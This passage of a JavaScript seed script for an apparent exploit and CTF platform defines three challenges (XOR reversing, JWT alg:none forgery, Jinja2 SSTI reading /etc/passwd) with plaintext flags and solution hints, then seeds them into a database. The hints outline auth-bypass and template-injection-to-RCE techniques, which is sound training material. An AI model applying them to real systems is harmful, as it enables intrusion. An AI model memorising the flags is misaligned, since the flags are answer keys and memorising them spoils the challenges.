    flag: 'xcloak{r3v3rs3d_w1th_0x61}',
    points: 200,
    hints: ['Open in Ghidra or IDA — look for strcmp or memcmp', 'The XOR key is a single byte', 'XOR the target bytes with the key'],
    authorAlias: 'xcloak_admin',
    status: 'approved',
  },
  {
    title: 'JWT Forgery',
    category: 'web',
    difficulty: 'hard',
    description: `The application uses JWT for authentication. The server accepts tokens with alg:none if the signature is omitted. Login as admin to get the flag.\n\nYou have a valid token for user "guest". Modify it to become admin without knowing the secret.`,
    flag: 'xcloak{jwt_n0n3_4lg_byp4ss_gg}',
    points: 400,
    hints: ['Decode the JWT (base64url)', 'Change alg to "none" and role to "admin"', 'Remove the signature but keep the trailing dot'],
    authorAlias: 'xcloak_admin',
    status: 'approved',
  },
  {
    title: 'SSTI — Template Injection',
    category: 'web',
    difficulty: 'hard',
    description: `The /render endpoint accepts a template string and renders it with Jinja2. Find a payload that reads /etc/passwd and then the flag at /flag.txt.\n\nExample: GET /render?t=Hello+{{name}} returns "Hello World"\n\nRestrictions: The string "config", "self", and "import" are blacklisted.`,
    flag: 'xcloak{sst1_t0_rc3_v1a_j1nj4}',
    points: 450,
    hints: ['Try {{7*7}} to confirm SSTI', 'Use __class__.__mro__ to traverse the MRO', 'Look for subprocess or os in the subclasses list'],
    authorAlias: 'xcloak_admin',
    status: 'approved',
  },
]

async function main() {
  console.log('=== XCloak Database Seed ===\n')

  // Seed exploits
  console.log('Seeding exploits...')
  let exploitOk = 0
  for (const ex of EXPLOITS) {
    try {
      await prisma.exploit.upsert({
        where:  { slug: ex.slug },
        create: ex,
        update: { views: ex.views, upvotes: ex.upvotes, score: ex.score, status: ex.status },
      })
      console.log(`  ✓ ${ex.title.slice(0, 60)}`)
      exploitOk++
    } catch (e) {
      console.log(`  ✗ ${ex.slug}: ${e.message?.slice(0, 80)}`)
    }
  }

  // Seed CTF challenges
  console.log('\nSeeding CTF challenges...')
  let ctfOk = 0
  for (const ch of CTF_CHALLENGES) {
    try {
      const flagHash = createHash('sha256').update(ch.flag).digest('hex')
      const existing = await prisma.cTFChallenge.findFirst({ where: { title: ch.title } })
      if (existing) {
        await prisma.cTFChallenge.update({ where: { id: existing.id }, data: { status: ch.status } })
        console.log(`  ~ ${ch.title} (updated)`)
      } else {
        await prisma.cTFChallenge.create({
          data: {
            title:       ch.title,
            category:    ch.category,
            difficulty:  ch.difficulty,
            description: ch.description,
            flagHash,
            points:      ch.points,
            hints:       ch.hints,
            authorAlias: ch.authorAlias,
            status:      ch.status,
          },
        })
        console.log(`  ✓ ${ch.title}`)
      }
      ctfOk++
    } catch (e) {
      console.log(`  ✗ ${ch.title}: ${e.message?.slice(0, 80)}`)
    }
  }

  console.log(`\n✅ Done: ${exploitOk}/${EXPLOITS.length} exploits, ${ctfOk}/${CTF_CHALLENGES.length} CTF challenges`)
  await prisma.$disconnect()
}

main().catch(e => { console.error(e); prisma.$disconnect(); process.exit(1) })
